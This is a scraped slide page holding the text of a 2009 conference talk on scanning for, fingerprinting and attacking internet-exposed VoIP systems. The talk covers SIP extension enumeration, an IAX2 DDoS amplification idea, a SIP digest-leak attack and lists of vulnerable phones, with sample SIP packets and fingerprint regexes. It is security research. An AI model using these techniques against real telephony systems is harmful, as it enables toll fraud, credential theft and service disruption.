WebRTC meetup barcelona 2017WebRTC meetup barcelona 2017
WebRTC meetup barcelona 2017
 
Session Initiation Protocol - In depth analysis
Session Initiation Protocol - In depth analysisSession Initiation Protocol - In depth analysis
Session Initiation Protocol - In depth analysis
 
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
 
Hacking Trust Relationships Between SIP Gateways
Hacking Trust Relationships Between SIP GatewaysHacking Trust Relationships Between SIP Gateways
Hacking Trust Relationships Between SIP Gateways
 
"Seguridad" VoIP
"Seguridad" VoIP"Seguridad" VoIP
"Seguridad" VoIP
 
ACI MultiPod 구성
ACI MultiPod 구성ACI MultiPod 구성
ACI MultiPod 구성
 
Gpon omci v2__voice_configuration_introduction_omciv2_v2_pt_telkom
Gpon omci v2__voice_configuration_introduction_omciv2_v2_pt_telkomGpon omci v2__voice_configuration_introduction_omciv2_v2_pt_telkom
Gpon omci v2__voice_configuration_introduction_omciv2_v2_pt_telkom
 
VoIP security: Implementation and Protocol Problems
VoIP security: Implementation and Protocol ProblemsVoIP security: Implementation and Protocol Problems
VoIP security: Implementation and Protocol Problems
 
Office Comunnications Server 2007 R2 Poster
Office Comunnications Server 2007 R2 PosterOffice Comunnications Server 2007 R2 Poster
Office Comunnications Server 2007 R2 Poster
 
Microsoft lync server 2010 protocol workloads poster
Microsoft lync server 2010 protocol workloads posterMicrosoft lync server 2010 protocol workloads poster
Microsoft lync server 2010 protocol workloads poster
 
Designing High Performance RTC Signaling Servers
Designing High Performance RTC Signaling ServersDesigning High Performance RTC Signaling Servers
Designing High Performance RTC Signaling Servers
 
Session Initiation Protocol
Session Initiation ProtocolSession Initiation Protocol
Session Initiation Protocol
 
SIP in action Itexpo West
SIP in action Itexpo WestSIP in action Itexpo West
SIP in action Itexpo West
 
Network Security Best Practice (BCP38 & 140)
Network Security Best Practice (BCP38 & 140) Network Security Best Practice (BCP38 & 140)
Network Security Best Practice (BCP38 & 140)
 

Mehr von Sandro Gauci

CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...Sandro Gauci
 
TADSummit 2022 - How to bring your own RTC platform down
TADSummit 2022 - How to bring your own RTC platform downTADSummit 2022 - How to bring your own RTC platform down
TADSummit 2022 - How to bring your own RTC platform downSandro Gauci
 
The OpenSIPS security audit - OpenSIPS Summit - Sandro Gauci
The OpenSIPS security audit - OpenSIPS Summit - Sandro GauciThe OpenSIPS security audit - OpenSIPS Summit - Sandro Gauci
The OpenSIPS security audit - OpenSIPS Summit - Sandro GauciSandro Gauci
 
Tools for offensive RTC Security: introducing SIPVicious PRO and the demo server
Tools for offensive RTC Security: introducing SIPVicious PRO and the demo serverTools for offensive RTC Security: introducing SIPVicious PRO and the demo server
Tools for offensive RTC Security: introducing SIPVicious PRO and the demo serverSandro Gauci
 
Bounty bout 0x01 - WebRTC edition
Bounty bout 0x01 - WebRTC editionBounty bout 0x01 - WebRTC edition
Bounty bout 0x01 - WebRTC editionSandro Gauci
 
The various ways your RTC may be crushed
The various ways your RTC may be crushedThe various ways your RTC may be crushed
The various ways your RTC may be crushedSandro Gauci
 
A tale of two RTC fuzzing approaches
A tale of two RTC fuzzing approachesA tale of two RTC fuzzing approaches
A tale of two RTC fuzzing approachesSandro Gauci
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationSandro Gauci
 
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...Sandro Gauci
 

Mehr von Sandro Gauci (9)

CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
 
TADSummit 2022 - How to bring your own RTC platform down
TADSummit 2022 - How to bring your own RTC platform downTADSummit 2022 - How to bring your own RTC platform down
TADSummit 2022 - How to bring your own RTC platform down
 
The OpenSIPS security audit - OpenSIPS Summit - Sandro Gauci
The OpenSIPS security audit - OpenSIPS Summit - Sandro GauciThe OpenSIPS security audit - OpenSIPS Summit - Sandro Gauci
The OpenSIPS security audit - OpenSIPS Summit - Sandro Gauci
 
Tools for offensive RTC Security: introducing SIPVicious PRO and the demo server
Tools for offensive RTC Security: introducing SIPVicious PRO and the demo serverTools for offensive RTC Security: introducing SIPVicious PRO and the demo server
Tools for offensive RTC Security: introducing SIPVicious PRO and the demo server
 
Bounty bout 0x01 - WebRTC edition
Bounty bout 0x01 - WebRTC editionBounty bout 0x01 - WebRTC edition
Bounty bout 0x01 - WebRTC edition
 
The various ways your RTC may be crushed
The various ways your RTC may be crushedThe various ways your RTC may be crushed
The various ways your RTC may be crushed
 
A tale of two RTC fuzzing approaches
A tale of two RTC fuzzing approachesA tale of two RTC fuzzing approaches
A tale of two RTC fuzzing approaches
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And Exploitation
 
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...
 

Scanning The Intertubes For Voip

  • 1. ENABLESECURITY Scanning the Intertubes for VOIP Telephony exposed on the ‘net Con dence 2009
  • 2. ENABLESECURITY whoami • EnableSecurity • 9 years old • SIPVicious and VOIPPACK (for CANVAS) • Surfjack, Extended HTML Form attack Con dence 2009
  • 3. ENABLESECURITY next few minutes • Brief intro to how VoIP is being abused • Scanning for VoIP systems • How to fingerprint VoIP systems • Possibilities for abuse Con dence 2009
  • 4. ENABLESECURITY VoIP Scanning • SIP • IAX2 • H.323 • SCCP Con dence 2009
  • 5. ENABLESECURITY A primer on SIP • Text based just like HTTP • UDP port 5060 • INVITE gets things to buzz and ring • REGISTER sends phone calls your way • OPTIONS gives you supported options Con dence 2009
  • 6. ENABLESECURITY A primer on IAX2 • Binary protocol running on port 4569 • POKE is like ping • PONG is like er.. pong • REGREQ is like REGISTER • REGREJ stands for registration rejected Con dence 2009
  • 7. ENABLESECURITY VoIP and Cybercrime • Scans for SIP are on the rise • News of fraud • What is happening in the background? • What tools are they using? Con dence 2009
  • 8. ENABLESECURITY Scans OPTIONS sip:2658@195.159.X.X SIP/2.0 Via: SIP/2.0/UDP 0.0.0.0:1498;branch=BCEA2F83-1CEF-FC6A-2989-54C18CE6425E;rport Max-Forwards: 70 To: <sip:2658@195.159.X.X> From: <sip:8571@195.159.X.X>;tag=723535DC-E71F-E3D4-D572-2B41E58782E8 Call-ID: 4203F1B5-3E1F-E6D6-32FF-B8C2DFAA190F CSeq: 1 OPTIONS Contact: <sip:@0.0.0.0:1498;transport=udp> Accept: application/sdp Content-Length: 0 Con dence 2009
  • 9. ENABLESECURITY Honeypot • Some python code put together • Replies to requests and acts like a registrar Con dence 2009
  • 10. ENABLESECURITY demo Con dence 2009
  • 11. ENABLESECURITY SIP Scanning • OPTIONS is ideal for this • REGISTER adds value :-) • Tell between a registrar and an endpoint Con dence 2009
  • 12. ENABLESECURITY OPTIONS scan OPTIONS SIP scanner Registrar 200 OK Con dence 2009
  • 13. ENABLESECURITY Con dence 2009
  • 14. ENABLESECURITY Scanning IAX2 POKE Asterisk scanner Box PONG Con dence 2009
  • 15. ENABLESECURITY Con dence 2009
  • 16. ENABLESECURITY Headers of interest SIP/2.0 404 Not found Via: SIP/2.0/UDP 1.1.1.1:5061;branch=z9hG4bK-59472;received=1.1.1.1;rport=5061 From: quot;testquot; <sip:100@1.2.3.4:5060>;tag=d5a5bd3213c46cdd060c To: quot;testquot; <sip:100@1.2.3.4:5060>;tag=as05610bff Call-ID: 37012f88-24ac-44aa-ac45-2e6a05421e7d CSeq: 1 REGISTER User-Agent: Asterisk PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Content-Length: 0 Con dence 2009
  • 17. ENABLESECURITY Modified User-agent SIP/2.0 404 Not found Via: SIP/2.0/UDP 1.1.1.1:5061;branch=z9hG4bK-59472;received=1.1.1.1;rport=5061 From: quot;testquot; <sip:100@1.2.3.4:5060>;tag=d5a5bd3213c46cdd060c To: quot;testquot; <sip:100@1.2.3.4:5060>;tag=as05610bff Call-ID: 37012f88-24ac-44aa-ac45-2e6a05421e7d CSeq: 1 REGISTER User-Agent: MyVeryOwn PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Content-Length: 0 Con dence 2009
  • 18. ENABLESECURITY Give away SIP/2.0 404 Not found Via: SIP/2.0/UDP 1.1.1.1:5061;branch=z9hG4bK-59472;received=1.1.1.1;rport=5061 From: quot;testquot; <sip:100@1.2.3.4:5060>;tag=d5a5bd3213c46cdd060c To: quot;testquot; <sip:100@1.2.3.4:5060>;tag=as05610bff Call-ID: 37012f88-24ac-44aa-ac45-2e6a05421e7d CSeq: 1 REGISTER User-Agent: MyVeryOwn PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Content-Length: 0 Con dence 2009
  • 19. ENABLESECURITY Give away SIP/2.0 404 Not found Via: SIP/2.0/UDP 1.1.1.1:5061;branch=z9hG4bK-59472;received=1.1.1.1;rport=5061 From: quot;testquot; <sip:100@1.2.3.4:5060>;tag=d5a5bd3213c46cdd060c To: quot;testquot; <sip:100@1.2.3.4:5060>;tag=as05610bff Call-ID: 37012f88-24ac-44aa-ac45-2e6a05421e7d CSeq: 1 REGISTER User-Agent: MyVeryOwn PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Content-Length: 0 Con dence 2009
  • 20. ENABLESECURITY Fingerprinting To Tag Sipura / Linksys SPA [a-fA-F0-9]{16}i0 [a-fA-F0-9]{6,8}-[a-fA- Cisco VoIP Gateway F0-9]{2,4} AVM FRITZ!Box [a-fA-F0-9]{16,29} Con dence 2009
  • 21. ENABLESECURITY Order of headers SIP/2.0 200 OK Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-24832;rport;received=3.2.1.9 From: quot;helloquot; <sip:100@1.2.3.35:5060>;tag=d90a4f2313c4cc438e14 To: quot;helloquot; <sip:100@1.2.3.35:5060>;tag=as00ea0c68 Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663 CSeq: 1 OPTIONS User-Agent: xxx voicemail Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Contact: <sip:1.2.3.35> Accept: application/sdp Content-Length: 0 Con dence 2009
  • 22. ENABLESECURITY Order of headers SIP/2.0 404 Not Found Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-59202;received=3.2.1.9;rport=5061 From: quot;helloquot; <sip:100@1.2.3.138:5060>;tag=d90a4f8a13c4d8bf89f5 To: quot;helloquot; <sip:100@1.2.3.138:5060>;tag=as263e3393 Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663 CSeq: 1 OPTIONS User-Agent: xxx asterisk Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Supported: replaces Accept: application/sdp Content-Length: 0 Con dence 2009
  • 23. ENABLESECURITY Order of headers SIP/2.0 200 OK SIP/2.0 404 Not Found Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-24832;rport;received=3.2.1.9 Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK- From: quot;helloquot; <sip:100@1.2.3.35:5060>;tag=d90a4f2313c4cc438e14 <sip:100@1.2.3.138:5060>;tag=d9 From: quot;helloquot; To: quot;helloquot; <sip:100@1.2.3.35:5060>;tag=as00ea0c68To: quot;helloquot; <sip:100@1.2.3.138:5060>;tag=as26 Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663 Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663 CSeq: 1 OPTIONS CSeq: 1 OPTIONS User-Agent: sipgate voicemail User-Agent: sipbox asterisk Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REF Contact: <sip:1.2.3.35> Supported: replaces Accept: application/sdp Accept: application/sdp Content-Length: 0 Content-Length: 0 Con dence 2009
  • 24. ENABLESECURITY Order of headers SIP/2.0 200 OK SIP/2.0 401 Unauthorized Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-24832;rport;received=3.2.1.9 Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK- From: quot;helloquot; <sip:100@1.2.3.35:5060>;tag=d90a4f2313c4cc438e14 <sip:100@1.2.3.40:5060>;tag=d90 From: quot;helloquot; To: quot;helloquot; <sip:100@1.2.3.35:5060>;tag=as00ea0c68To: quot;helloquot; <sip:100@1.2.3.40:5060>;tag=cfbe3 Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663 Cseq: 1 REGISTER CSeq: 1 OPTIONS Call-id: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663 User-Agent: sipgate voicemail WWW-Authenticate: Digest realm=quot;sipgate.atquot;, Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY0 Content-Length: Contact: <sip:1.2.3.35> Accept: application/sdp Content-Length: 0 Con dence 2009
  • 25. ENABLESECURITY Case for header names SIP/2.0 200 OK SIP/2.0 401 Unauthorized Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-24832;rport;received=3.2.1.9 Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK- From: quot;helloquot; <sip:100@1.2.3.35:5060>;tag=d90a4f2313c4cc438e14 <sip:100@1.2.3.40:5060>;tag=d90 From: quot;helloquot; To: quot;helloquot; <sip:100@1.2.3.35:5060>;tag=as00ea0c68To: quot;helloquot; <sip:100@1.2.3.40:5060>;tag=cfbe3 Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663 Cseq: 1 REGISTER CSeq: 1 OPTIONS Call-id: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663 User-Agent: sipgate voicemail WWW-Authenticate: Digest realm=quot;sipgate.atquot;, Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY0 Content-Length: Contact: <sip:1.2.3.35> Accept: application/sdp Content-Length: 0 Con dence 2009
  • 26. ENABLESECURITY Fingerprinting • Just one packet needed • To tag • Headers • Community effort Con dence 2009
  • 27. ENABLESECURITY Community effort • SIPVicious 0.2.3 • Included svlearnfp.py • Generated regular expressions for to tags • Generated hashes describing headers • SIPVicious 2.0 ... Con dence 2009
  • 28. ENABLESECURITY Interesting facts • Random scans work pretty well • ADSL etc FRITZ!Box, Speedtouch • Asterisk • Cisco Gateways Con dence 2009
  • 29. ENABLESECURITY demo Con dence 2009
  • 30. ENABLESECURITY Introducing REGISTER • Binds an extension to an IP and port • Normally requires authentication • If no password is set it binds without auth Con dence 2009
  • 31. ENABLESECURITY More interesting facts • The REGISTER scan • Dangerous • Useful for cheap honeypots :-) Con dence 2009
  • 32. ENABLESECURITY Enumeration of extensions • Response to a REGISTER for non-existent extension • A different response indicates that the extension exists • If the extension has no password it sends a 200 OK • Otherwise asks for authentication Con dence 2009
  • 33. ENABLESECURITY * 1 00 ER EG IST R ISTE R 101 REG REGISTER 102 Con dence 2009
  • 34. ENABLESECURITY * nd ot fou 40 4N 20 0 OK 401 Auth required Con dence 2009
  • 35. ENABLESECURITY demo Con dence 2009
  • 36. ENABLESECURITY DDoS using IAX2? REG REQ * :-) ACK REGREJ ACK Con dence 2009
  • 37. ENABLESECURITY DDoS using IAX2? REG REQ * }:-) ACK REGREJ Con dence 2009
  • 38. ENABLESECURITY DDoS using IAX2? REG REQ * }:-) ACK REGREJ REGREJ Con dence 2009
  • 39. ENABLESECURITY DDoS using IAX2? REG REQ * }:-) ACK REGREJ REGREJ REGREJ Con dence 2009
  • 40. ENABLESECURITY DDoS using IAX2? }:-) REGR EQ * :-/ ACK REGREJ REGREJ REGREJ Con dence 2009
  • 41. ENABLESECURITY DDoS using IAX2? ** ** :-o ** ** * }:-) Con dence 2009
  • 42. ENABLESECURITY DDoS using IAX2? ** ** :’-( ** ** * }:-) Con dence 2009
  • 43. ENABLESECURITY Con dence 2009
  • 44. ENABLESECURITY SIP Digest Auth • REGISTER usually gets a 401 Unauthorized • INVITE gets a 407 Proxy Authentication • Challenge response mechanism • Takes various properties + password • Nonce, Method, URI Con dence 2009
  • 45. ENABLESECURITY Digest Leak INVITE 200 OK Con dence 2009
  • 46. ENABLESECURITY Digest Leak BYE 407 Challenge Con dence 2009
  • 47. ENABLESECURITY demo Con dence 2009
  • 48. ENABLESECURITY Vulnerable endpoints • X-lite • Gizmo5 • Zoiper Con dence 2009
  • 49. ENABLESECURITY Vulnerable endpoints • Cisco 7940 • Grandstream GXP* • Patton Smartlink • Linksys SPA942 • Fritzbox Con dence 2009
  • 50. ENABLESECURITY But ... • There’s no SIP Phones on the ‘net! • There are ;-) • The ‘net is full of Fritzbox • Internal endpoints behind NAT Con dence 2009
  • 51. ENABLESECURITY More at.. • EnableSecurity.com/research • Sipvicious.org • VOIPSA.org Con dence 2009
  • 52. ENABLESECURITY Shoutouts! • Sjur at usken.no • dudes from .mt =) Con dence 2009
  • 53. ENABLESECURITY Q.A Con dence 2009
  • 54. ENABLESECURITY sandro@enablesecurity.com Con dence 2009